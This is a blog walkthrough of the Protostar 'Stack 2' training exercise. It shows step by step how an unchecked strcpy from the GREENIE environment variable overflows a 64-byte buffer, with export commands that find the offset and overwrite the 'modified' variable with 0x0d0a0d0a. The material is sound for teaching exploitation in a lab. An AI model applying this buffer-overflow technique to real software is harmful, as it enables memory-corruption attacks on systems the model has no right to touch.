[ExpDev] Exploit Exercise | Protostar | Stack 2

Stack 2

The goal of this challenge is to leverage a local variable to cause a BOF to overwrite the “modified” variable value to print the winning statement.

  • variable = getenv("GREENIE");: getenv() call will simply read the string value from local environment variable called “GREENIE.”
  • modified = 0: So the “modified” variable is hardcoded to 0.
  • strcpy(buffer, argv[1]);: This is the vulnerable func of this program. It will copy the user supplied strings to a pointer; however, if the strings are bigger than the set buffer which is 64 bytes in this case (char buffer[64];), the BOF will happen.

Setting Environment Variable

In Linux, you can set the environment variable and its value using a command called export.

$ export GREENIE='bigb0ss'            # Setting Environment Variable
$ echo $GREENIE # Printing the value
bigb0ss

Initial Recon

When we set the environment variable value with less than 64 bytes, we will always get the output of “0x00000000”; however, if we set it with more than 64 bytes, it will cause a BOF and change the “modified” values.

$ export GREENIE='bigb0ss'
$ ./stack2
Try again, you got 0x00000000

$ export GREENIE=$(python -c 'print "A" * 70')
$ ./stack2
Try again, you got 0x41414141

Exploit

Exploit workflow should be very simpler to stack1. We need to find the offset value → overwrite the next instruction value with “0x0d0a0d0a.”

To find the offset,

$ export GREENIE=$(python -c 'print "A" * 60 + "BBBBCCCCDDDD"')
$ ./stack2
Try again, you got 0x43434343

The “modified” value is now overwritten with “0x43434343” (“0x43 = C); hence we know that the offset is 64 (60 + “BBBB”).

Next, using python convert the hex to ASCII.

>>> chr(0x0d)
'\r'
>>> chr(0x0a)
'\n'

Putting all together, let’s exploit the stack2 and print out the winning statement. (Since it’s little-endian, we need to add those ASCII values in backward. “0x0d0a0d0a” → “\n\r\n\r”)

$ export GREENIE=$(python -c 'print "A" * 64 + "\n\r\n\r"')
$ ./stack2
you have correctly modified the variable

GDB (*Hand Writing)

Doing this by hand also helps better understanding of how the program operates. (Sorry for the water marks. Accidentally placed this on my kitchen table… -_-)

Thanks for reading!

  • Stack 3 — Stack-based BOF: Basic 3

OSCE | OSCP | CREST | Offensive Security Consultant — All about Penetration Test | Red Team | Cloud Security | Web Application Security

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store